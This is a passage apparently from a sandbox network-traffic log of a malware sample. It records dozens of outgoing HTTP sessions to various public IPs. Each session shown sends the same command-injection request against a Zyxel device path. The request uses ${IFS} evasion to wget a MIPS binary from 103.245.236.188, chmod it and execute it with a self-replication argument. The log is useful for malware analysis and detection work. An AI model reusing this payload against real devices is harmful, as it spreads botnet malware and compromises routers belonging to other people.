                                                Jan 12, 2024 18:24:37.905731916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4852192.168.2.135083619.223.117.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905776024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4853192.168.2.134101637.37.214.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905833960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4854192.168.2.134830658.32.147.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905862093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4855192.168.2.133376890.202.73.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905900955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4856192.168.2.133361899.221.200.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905946016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4857192.168.2.133474674.11.105.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.905998945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4858192.168.2.1335328139.187.90.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906025887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4859192.168.2.1352752134.143.175.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906080008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4860192.168.2.133364862.239.128.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906080008 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4861192.168.2.13577429.167.138.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906120062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4862192.168.2.135887638.138.12.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906181097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4863192.168.2.1357582150.243.219.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906232119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4864192.168.2.133408468.164.120.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906259060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4865192.168.2.1352586198.207.69.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906307936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4866192.168.2.135442067.107.140.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906362057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4867192.168.2.1341178211.154.211.23443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906385899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4868192.168.2.1359480104.148.47.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906424046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4869192.168.2.1342484122.75.224.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906459093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4870192.168.2.135705436.202.10.137443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906498909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4871192.168.2.134325632.132.240.16443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906550884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4872192.168.2.1351096124.180.88.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906575918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4873192.168.2.135440023.143.184.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906608105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4874192.168.2.134975879.123.0.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906670094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4875192.168.2.1332838181.0.127.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906708002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4876192.168.2.133303254.1.56.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906735897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4877192.168.2.1339204210.4.217.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906765938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4878192.168.2.13474964.151.228.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906811953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4879192.168.2.134923450.111.158.233443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906855106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4880192.168.2.1351558111.169.161.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906905890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4881192.168.2.135841465.158.207.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906940937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4882192.168.2.135558661.198.182.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.906975031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4883192.168.2.135843858.91.139.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907011032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4884192.168.2.134635636.120.126.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907047987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4885192.168.2.135073651.132.90.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907093048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4886192.168.2.1358350222.79.20.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907143116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4887192.168.2.134514234.49.110.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907166958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4888192.168.2.133311827.54.62.54443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907205105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4889192.168.2.1346096141.84.187.204443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907236099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4890192.168.2.1344014147.27.72.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907263994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4891192.168.2.135819495.93.218.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907300949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4892192.168.2.134672817.144.82.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907352924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4893192.168.2.1341316180.254.11.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907397032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4894192.168.2.1341506191.206.170.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907409906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4895192.168.2.1347108142.38.0.48443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907463074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4896192.168.2.1343876124.144.58.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907504082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4897192.168.2.1359126145.207.206.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907545090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4898192.168.2.1360250186.198.92.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907563925 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4899192.168.2.1345012164.226.3.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907607079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4900192.168.2.1354934123.229.254.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907628059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4901192.168.2.134603844.226.9.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907689095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4902192.168.2.135166289.58.202.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907726049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4903192.168.2.1346556161.78.227.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907778978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4904192.168.2.1358470184.253.108.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907795906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4905192.168.2.1352494110.253.137.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907849073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4906192.168.2.1342912217.135.117.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907887936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4907192.168.2.1348322106.197.198.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907947063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4908192.168.2.133390694.52.186.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.907967091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4909192.168.2.1346928105.4.94.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908001900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4910192.168.2.135724650.93.106.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908063889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4911192.168.2.1340500115.85.98.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908090115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4912192.168.2.133943212.188.139.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908149004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4913192.168.2.135337871.232.176.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:37.908169031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                4914192.168.2.1347666197.90.214.226443
                                                TimestampBytes transferredDirectionData
